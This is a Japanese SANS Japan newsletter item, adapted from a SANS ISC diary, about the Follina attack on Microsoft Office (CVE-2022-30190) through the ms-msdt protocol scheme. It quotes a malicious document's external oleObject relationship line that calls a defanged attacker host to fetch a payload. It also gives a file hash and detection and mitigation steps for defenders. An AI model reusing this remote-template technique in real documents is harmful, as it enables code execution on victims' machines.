View profile

「ms-msdt」プロトコルスキームを悪用したMicrosoft Officeに対する新しい攻撃手法(CVE-2022-30190)

SANS Japanニュースレター
SANS Japanニュースレター
「ms-msdt」プロトコルスキームを悪用したMicrosoft Officeに対する新しい攻撃手法(CVE-2022-30190)

Microsoftによる公式のブログポストはこちら:Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability
MSDT URLプロトコルを無効にする対策方法が公開され、この脆弱性にCVE番号も付与されました。
ヨーロッパの多くの国では週末の間で、アメリカでも3連休の月曜日でしたが、Microsoft Officeドキュメントに関する新しい攻撃手法が話題になりました。@nao_secが、細工されたMicrosoft WordドキュメントをTwitterにて報告したところから始まりました。Officeドキュメントを悪用した攻撃としては、VBAやXLS 4マクロ、ペイロードを用いるマルウェアが一般的でした。しかし、今回悪用された手法は全く新しい観点で細工されたものでした。
該当のファイルはVirusTotalによると17種類のアンチウィルスエンジンでのみ検知される状況です。
(sha256:4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784)[2]
このファイルを開いても何も表示されませんが(白紙)、ドキュメントの仕様を確認すると興味深いことが分かります。このドキュメントには悪意のあるURLを指し示す外部参照が含まれています。
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html!" TargetMode="External"/>
ドキュメントを開くとwww[.]xmlformats[.]comのホストへ接続され、下記のペイロードがダウンロードされます。
「windows.location.href」が一番興味深いところです。プロトコルスキーマは「ms-msdt:/」(「/」はひとつのみ)です。MSDTとは「Microsoft Support Diagnostic Tool」の略で、Microsoft が用意した「msdt.exe」というツールが、MicrosoftのサポートにPCの情報を収集して送ります。
Microsoft OfficeはMSDT URLを自動的に処理し、Powershellのペイロードを実行します。このBase 64でエンコードされた文字列には以下のようなコマンドが含まれています。
この脆弱性は、マクロ機能が無効化されていたとしても悪用可能です。保護ビューが有効になっている場合はすぐに影響を受けることはありませんが、保護ビューを解除すると影響を受ける可能性があります。また、Kevin BeaumontがRTFに変換されたドキュメントでもテストをしています。Windows Explorerでドキュメントをプレビューしただけでも悪用されてしまいます。
この週末に研究者たちが悪意のあるファイルを確認していた際、Didierがコード実行のデモとして電卓プログラムを起動する新しいペイロードを生成し。実際の動作を動画で公開しました。
Microsoftのこの挙動はあまりに脆弱です。どのように検知すればいいのでしょうか? 悪意あるドキュメントには"ms-msdt:/“というスキーマの文字列自体は含まれていません。ドキュメントを開いた後にOfficeによってダウンロードされた最初のペイロードに含まれます。検知・対策のためのいくつかの案を例示します。
1.親子関係の確認:word.exeやexcel.exeなどの親のプロセスから起動されたmsdt.exeプロセスを追跡する必要があります。
2.レジストリからの「ms-msdt」スキーマの削除:Didierによると実際にレジストリから「ms-msdt」スキーマを削除することで動作を抑えることができました。
3.Officeが子プロセスを生成させないようにするためのASLルールの作成:
Set-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Enabled
4.組織内ユーザへ不審な文書は開かないように注意喚起をしてください。
今後もこの新しい攻撃手法については調査を続け、随時情報発信をしていきます。
元の記事:https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694/
Did you enjoy this issue? Yes No
SANS Japanニュースレター
SANS Japanニュースレター

SANS Japan公式アカウントです。イベント情報やセキュリティに関するニュースを発信しております。
SANS is the most trusted source for Network, Computer, and Information Security Training and certification.

In order to unsubscribe, click here.
If you were forwarded this newsletter and you like it, you can subscribe here.
Created with Revue by Twitter.